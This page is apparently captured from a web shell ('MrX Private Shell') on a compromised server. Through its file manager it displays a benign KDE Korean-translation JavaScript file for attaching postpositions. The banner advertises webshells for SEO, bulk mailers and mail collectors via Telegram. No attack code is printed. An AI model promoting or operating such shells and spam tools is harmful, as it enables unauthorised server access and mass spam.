__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.216.44: ~ $
// kdelibs4.js of Korean KDE translation
// This script is distributed under GNU General Public License, version 2 or later.
// Copyright (C) Chusslove Ilich, 2007. (for strip accelerator part)
// Copyright (C) Park Shinjo, 2007. (rest of all)
//

stripAccRx = /\((&|&amp;)?[a-zA-Z0-9]\)/;
lstJosa = [["가","이","이(가)",false],
           ["를","을","을(를)",false],
           ["는","은","은(는)",false],
           ["와","과","과(와)",false],
           ["","이","(이)",false],
           ["","으","(으)", true]];

// *** Detect the provided word is Hangeul.
function isHangeul(code)
{
    if (code >= 0xac00 && code <= 0xd7af) return true;
    else return false;
}

// *** Strip the accelerator marker, composed of an ASCII alphanumeric
// within parenthesis (with or without an ampersand in front).
function stripAccelerator(phrase)
{
    return phrase.replace(stripAccRx, "");
}

// *** Detect the phrase has 종성(Final jamo). It will be used in
// detection of 을/를, 이/가.
function getFinalJamoType(phrase, rieul)
{
    var code = phrase.charCodeAt(phrase.length - 1);
    if (!isHangeul(code)) return 2;
    code -= 0xac00;
    code %= 28;
    if (rieul && code == 8) return 0;
    switch (code) {
    case 0:
        return 0;
    default:
        return 1;
    }
}

// Functions in below attach appropriate 조사 (postposition)
// according to the word. It only affects Hangeul, if non-Hangeul
// word is provided, then fallback string is used.
function attachJosa(type, phrase)
{
    var i = getFinalJamoType(phrase, lstJosa[type][3]);
    return lstJosa[type][i];
}

function attachIGa(phrase)
{
    return attachJosa(0, phrase);
}

function attachEulReul(phrase)
{
    return attachJosa(1, phrase);
}

function attachEunNeun(phrase)
{
    return attachJosa(2, phrase);
}

function attachWaGwa(phrase)
{
    return attachJosa(3, phrase);
}

function attachI(phrase)
{
    return attachJosa(4, phrase);
}

function attachEu(phrase)
{
    return attachJosa(5, phrase);
}


// ==> Exports to PO calls
Ts.setcall("~stripAccel", stripAccelerator);
Ts.setcall("을를", attachEulReul);
Ts.setcall("이가", attachIGa);
Ts.setcall("은는", attachEunNeun);
Ts.setcall("와과", attachWaGwa);
Ts.setcall("이", attachI);
Ts.setcall("으", attachEu);

Filemanager

Name Type Size Permission Actions
ki18n5.js File 2.23 KB 0644
Filemanager